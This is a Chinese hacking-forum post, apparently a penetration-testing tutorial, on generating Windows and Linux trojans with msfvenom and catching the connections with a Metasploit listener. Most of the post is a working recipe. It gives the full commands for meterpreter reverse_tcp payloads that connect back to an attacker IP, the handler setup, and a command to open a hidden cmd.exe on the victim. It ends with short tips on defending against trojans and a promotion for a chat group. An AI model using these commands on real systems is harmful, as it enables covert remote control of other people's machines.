找回密码
 立即注册
注册 登录
×
热搜: 活动 交友 discuz
查看: 66|回复: 0

渗透测试—kali入门到入狱之生成木马程序的利用、开启监听模式

[复制链接]

1

主题

1

帖子

3

积分

新手上路

Rank: 1

积分
3
发表于 2022-11-29 15:27:25 | 显示全部楼层 |阅读模式


木马

概括:
当您忍不住点击一个(美女图片)或(帅哥图片)的时候,或者是您安装了一个来路不明的程序时,再或者是您随意点击了一个链接后,可能您的设备就已经沦陷了。

测试机:kali2021
靶场:靶机:win2008R2
           靶机:Linux系统

Part.1、生成(Trojan horse)程序.(Windows)
1、查看 kali 的 IP 地址命令:
ifconfig


2、生成(Trojan horse)程序
命令概括:msfvenom  -p windows/meterpreter/reverse_tcp(使用payload是windows/meterpreter/reverse_tcp) lhost=kali的IP地址 lport=端口号(比如4444) -f exe >文件名.exe
执行的命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f exe >bgxg.exe
然后在文件夹里可以看见我们生成的 bgxg.exe 程序

3、开启监听模式
(1)打开 msf 命令:
msfconsole(2)加载模块 命令:
use exploit/multi/handler(3)设置 payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set payload windows/meterpreter/reverse_tcp(4)设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set lhost 192.168.1.105(5)设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
set LPORT 4444(6)执行命令:
run(7)当点击程序时就行了(windows 操作系统都行)


(8)可以进到靶机电脑的命令行下 命令:
execute -H -i -f cmd.exe(9)但你想查看ip地址等信息时出现乱码可以输入 命令:
chcp 6500
Part.2、生成(Trojan horse)程序.( Linux )

1、查看 kali 的 IP 地址 命令:
ifconfig


2、生成(Trojan horse)程序:
命令概括:msfvenom -a x64(操作系统为64位) --platform linux(操作系统)  -p linux/x64/meterpreter/reverse_tcp(使用payload是linux/x64/meterpreter/reverse_tcp)  LHOST=kali的IP地址 LPORT=端口号  -i 3 -f elf(文件的格式是elf) -o 文件名

执行的命令:
msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.1.105 LPORT=5555  -i 3 -f elf -o test
然后在文件夹里可以看见我们生成的 bgxg 程序:

3、开启监听模式:
(1)打开 msf 命令:
msfconsole(2)加载模块 命令:
use exploit/multi/handler (3)设置 payload 命令:(记得设置的 linux/x64/meterpreter/reverse_tcp 要和程序的一样)
set payload linux/x64/meterpreter/reverse_tcp(4)设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set lhost 192.168.1.105(5)设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
set LPORT 5555(6)执行 命令:
run(7)当点击程序的就行了( Linux操作系统都行)



到这里就结束了,最后介绍一些防止中病毒木马的小方法:
(1)开启操作系统防火墙;

(2)关闭高风险端口(通过防火墙设置出入站规则),比如135、137、138、139、445、3389(Windows远程端口)等;

(3)关闭或改成手动高风险不常用服务,比如RemoteRegistry、TCP/IPetBIOSHelper、sever(这个服务与ComputerBrowser是提供共享打印机、文件类的服务,如果不用可以关闭,win10好像没有ComputerBrowser服务了)、TerminalServices(该服务是远程协助服务,与3389端口有关,win10好像没了,估计改名了);

(4)强化账号密码策略:启用账号密码错误次数限制及错误锁定;采用数字、字母、特殊符号至少两组且不少于8位的密码;删除多余账号;

(5)做好上面工作后,日常安全意识要提高,不要随意打开不知名文件、非法网站或下载、安装不知名程序,不打开未知链接(包括邮件内容链接及其附件)等。
<hr/>今天的内容就分享到这里,为方便大家讨论,博主搞了一个技术群,有些工具大家也不用在后台私信我了
,都已以文档的形式安排在群了,扫码拉你进群哦

如果有小伙伴对kali、网络安全、linux、K8S、GO语言等感兴趣,可以关注公众号“学神来啦”,定时更新哦~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋| 黑客通

GMT+8, 2025-10-13 05:10 , Processed in 0.087094 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2020, LianLian.

快速回复 返回顶部 返回列表